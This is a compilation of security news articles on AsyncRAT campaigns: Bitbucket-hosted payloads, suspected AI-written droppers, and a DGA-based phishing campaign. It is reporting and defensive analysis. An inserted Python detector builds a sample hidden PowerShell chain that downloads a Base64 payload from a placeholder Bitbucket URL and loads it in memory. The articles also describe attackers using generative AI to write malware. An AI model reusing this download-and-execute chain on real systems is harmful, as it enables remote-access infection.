
AsyncRAT Malware Exploits Bitbucket to Launch Multi-Stage Attack


G DATA Security Lab has discovered a sophisticated malware operation that used Bitbucket, a popular code hosting platform, to propagate AsyncRAT, a well-known remote access trojan. 

According to the study, the attackers employed a multi-stage assault strategy, exploiting Bitbucket to host and disseminate malware payloads while circumventing detection. 

The malware operators employed multiple layers of Base64 encoding to obfuscate the code and hide the true nature of the assault. “After peeling back those layers we were able to uncover the full story and key indicators of compromise (IOCs) we found while analyzing the AsyncRAT payload delivery,” the report explains. 

Bitbucket's trustworthy reputation as a software development platform has made it a popular choice for attackers. The perpetrators used Bitbucket repositories to host a variety of malicious payloads, including AsyncRAT.

"Attackers have turned to Bitbucket, a popular code hosting platform, to host their malicious payloads," the researchers wrote, emphasising that this strategy gives "legitimacy" and "accessibility" for propagating the malware. 

Modus operandi

The attack starts with a phishing email that includes a malicious VBScript file called "01 DEMANDA LABORAL.vbs," which runs a PowerShell command. This initial stage obfuscates and delivers the payload through several layers of string manipulation and Base64 encoding. "The VBScript constructs and executes a PowerShell command, effectively transitioning the attack to the next stage," according to the report. 

The second stage involves the PowerShell script downloading a file from a Bitbucket repository. This file, named "dllhope.txt," contains a Base64-encoded payload that is decoded into a .NET-built executable, revealing the AsyncRAT malware. 

When successfully deployed, AsyncRAT gives attackers complete remote control over the infected system. "AsyncRAT provides attackers with extensive control over infected machines, enabling them to perform a wide range of malicious activities," according to G DATA's investigation. These actions include remote desktop control, file management, keylogging, access to webcams and microphones, and unauthorised command execution. 

The report also illustrates how the attackers use anti-virtualization checks to evade analysis in sandbox environments. "If the flag parameter contains '4,' the code checks for the presence of virtualisation tools like VMware or VirtualBox, likely to avoid analysis," indicated G DATA. Persistence is achieved through a variety of tactics, including Windows registry alterations and the creation of startup shortcuts, which ensure the malware remains active even after the system reboots.
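As an added example (not code from the G DATA report), the following Python detector does what an analyst does with a PowerShell script-block log line from this chain: it peels nested Base64 layers and flags the indicators the report describes (a hidden window, FromBase64String, a raw Bitbucket .txt download, an in-memory assembly load). The Bitbucket path, the indicator regexes and the sample log line are constructed for this example.

```python
import base64, binascii, re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # runs long enough to carry code
# Indicators taken from the chain described above; the regexes are my assumptions.
INDICATORS = {
    "bitbucket_raw_download": re.compile(r"bitbucket\.org/.+?/raw/", re.I),
    "txt_hosted_payload": re.compile(r"\.txt['\"]", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "inmemory_assembly_load": re.compile(r"\[Reflection\.Assembly\]::Load", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

def _decode_text(run):
    """Decode one Base64 run; return it as text only if it reads as script."""
    run = run.rstrip("=")
    try:
        raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
    except binascii.Error:
        return None
    for enc in ("utf-8", "utf-16-le"):   # -EncodedCommand passes UTF-16LE
        text = raw.decode(enc, errors="replace")
        if "\ufffd" not in text and all(c.isprintable() or c.isspace() for c in text):
            return text
    return None

def peel_layers(text, max_depth=6):
    """Recursively decode Base64 runs, returning every readable layer found."""
    layers, frontier = [], [text]
    for _ in range(max_depth):
        found = [t for layer in frontier for m in B64_RUN.finditer(layer)
                 if (t := _decode_text(m.group(0))) is not None]
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers

def matched_indicators(log_line):
    """Indicator names hit by the raw line or by any decoded layer beneath it."""
    return {n for layer in [log_line, *peel_layers(log_line)]
            for n, rx in INDICATORS.items() if rx.search(layer)}

# Constructed sample shaped like the report's chain (hypothetical Bitbucket path).
STAGE2 = ("$p=(New-Object Net.WebClient).DownloadString('https://bitbucket.org/"
          "EXAMPLE_USER/EXAMPLE_REPO/raw/main/dllhope.txt');"
          "[Reflection.Assembly]::Load([Convert]::FromBase64String($p))")
STAGE1 = ("iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE2.encode()).decode() + "')))")
SAMPLE_LOG = ("powershell.exe -w hidden -EncodedCommand "
              + base64.b64encode(STAGE1.encode("utf-16-le")).decode())
```

Running `matched_indicators(SAMPLE_LOG)` returns all five indicator names, because the Bitbucket fetch and assembly load only become visible two Base64 layers down.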

AI-Generated Malware Discovered in the Wild


Researchers found malicious code that they suspect was developed with the aid of generative artificial intelligence services to deploy the AsyncRAT malware in an email campaign that was directed towards French users. 

While threat actors have employed generative AI technology to design convincing emails, government agencies have warned that AI tools could also be abused to create malicious software, despite the safeguards and restrictions that vendors have implemented. 

Suspected cases of AI-created malware have been spotted in real attacks. The malicious PowerShell script that was uncovered earlier this year by cybersecurity firm Proofpoint was most likely generated by an AI system. 

In a sign that less technical threat actors are relying more on AI to develop malware, HP security researchers discovered a malicious campaign in early June that used code commented in the same manner a generative AI system would. 

The VBScript established persistence on the compromised PC by creating scheduled tasks and writing new keys to the Windows Registry. The researchers add that the indicators pointing to AI-generated malicious code include the structure of the scripts, the comments that explain each line, and the use of native-language function and variable names. 

AsyncRAT, an open-source, publicly available malware that can record keystrokes on the victim device and establish an encrypted connection for remote monitoring and control, is later downloaded and executed by the attacker. The malware can also deliver additional payloads. 

The HP Wolf Security research also states that, in terms of visibility, archives were the most popular delivery option in the first half of the year. Lower-level threat actors can use generative AI to create malware in minutes and customise it for assaults targeting different areas and platforms (Linux, macOS). 

Even if they do not use AI to create fully functional malware, hackers rely on it to accelerate their labour while developing sophisticated threats.

This Malware is Assaulting Critical US Infrastructure for Almost a Year


Over the course of the last 11 months, a threat group has actively engaged in a phishing campaign targeting employees across various companies, distributing an open-source trojan program named AsyncRAT. The victims of this campaign notably include companies responsible for managing critical infrastructure in the United States.

The cybersecurity division of AT&T, known as Alien Labs, has reported that the attackers employ a domain generation algorithm (DGA) within their command-and-control (C&C) infrastructure. This technique helps them rotate through a large number of domains, making it challenging to block traffic. In an effort to evade detection, the threat actors continually generate new samples of the malicious tool. Researchers have identified over 300 samples and 100 domains associated with this particular campaign.

AsyncRAT, an open-source remote access tool released in 2019 and still available on GitHub, serves as the attackers' weapon of choice. As a remote access trojan (RAT), AsyncRAT offers features such as keylogging, exfiltration techniques, and initial access staging for delivering the final payload.

It's not uncommon for even sophisticated threat actors to utilize open-source malware frameworks, providing advantages such as low development costs and plausible deniability. Interestingly, AsyncRAT had been previously employed in 2022 by an APT group known as Earth Berberoka or GamblingPuppet, as tracked by security firm Trend Micro.

The phishing emails, scrutinized by Alien Labs and other researchers, employ a thread hijacking technique to direct users to a phishing page, eventually dropping a JavaScript (.js) file on users' computers. This script, when opened in Notepad, contains numerous randomly commented-out English words, while variants using Sanskrit characters have also been reported in previous campaigns. The highly obfuscated script aims to download the second-stage payload from a URL encoded using a custom cipher and decimal values.

The second-stage payload is another encoded script in PowerShell, executed directly in memory without being saved to disk. The PowerShell script communicates with a rotating C&C server domain, sending information such as computer hostname and a variable indicating the likelihood of the computer being a virtual machine or sandbox.

If deemed a valid target, the C&C server deploys AsyncRAT. In the case of a potential virtual machine or sandbox, the server redirects the request to Google or launches a different PowerShell script that downloads and initiates a decoy RAT, designed to distract researchers investigating the campaign.

To further complicate detection, the attackers regularly randomize the script code and malware samples, and they rotate C&C domains weekly. Despite these efforts, Alien Labs researchers managed to reverse-engineer the domain generation algorithm, providing insight into historical samples and enabling the development of detection signatures for identifying future infrastructure. The AT&T Alien Labs report includes detection signatures for the Suricata intrusion detection system and a list of indicators of compromise (IOCs) for building detections on other systems.